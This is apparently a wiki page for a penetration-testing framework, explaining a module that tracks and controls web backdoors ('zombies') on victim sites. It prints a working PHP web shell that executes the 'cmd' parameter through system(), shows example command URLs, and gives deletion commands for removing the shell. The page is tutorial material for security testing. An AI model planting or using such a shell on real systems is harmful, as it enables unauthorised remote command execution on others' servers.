Skip to content

Web Herd Module (HTTP Bot)

Jump to bottom
Munir Njiru edited this page Nov 25, 2015 · 2 revisions

#Web Herd (HTTP Bot) Module This module is meant to make it less painful maintaining web backdoors over HTTP. the backdoors do not necessarily have to be from the Mth3lm3n3t Shell Generator Module. All they have to do is conform to the format of :

http://url-of-victim/path/to/backdoor.extension?commandParameter=Command

Using the example from the Shell Generator Module it would be something like :

http://victim.site/webdav/shell.php?cmd=whoami

This will help one consolidate all web backdoors in one location and prevent forgetting backdoors on target systems when done and saves the hustle of remembering where they are. No More runaway web shells.

Each bot is configured with three inputs:

  • Zombie Name - Nice descriptive name for your bot
  • Zombie Location - http path to the backdoor script
  • Zombie Parameter - parameter in the URL that receives commands e.g. cmd or someparameter etc

For purposes of this illustration we will set out our bot like this:

  • Attack Domain - attacker.google.com
  • Victim Domain - demo.owasp-mth3l3m3nt-framework.com

Our backdoor has been uploaded through a Webdav Exploit and the backdoor is as below:

<?php 
if (isset($_REQUEST['cmd'])){ 
    $cmd=($_REQUEST["cmd"]); 
    echo system($cmd); 
    die; 
} 
?>

the address to the backdoor is http://demo.owasp-mth3l3m3nt-framework.com/webdav/cmd.php

Adding a Bot to the Herd

  • Click on Web herd
  • Click on New Zombie
  • Fill in the details as shown below:

Add Bot

In this case:

Once a bot is added it will appear in the list as below:

Bot List

Controlling Bots

To use a bot click on the control button next to it a new window will appear.

  • Type your command in the text box
  • Click on Command me

A result will appear an example is shown below:

Bot Control

You can add as many bots as you please. Once all is done you need to destroy your bot then remove it from your inventory.

Deleting a Bot

  • In the bot list Control On the bot you want to delete
  • In the dialog type the delete command e.g.
windows: del /q script_name
linux: rm -f script_name

Our Current host is windows therefore deleting it will be as below: Bot Delete

  • After doing this go back to the bot list by clicking List all
  • Click on the Delete Button next to the bot.

You have now successfully removed your backdoor.

Developed by Munir Njiru

Developer Website

Project Site

Mailing List

Clone this wiki locally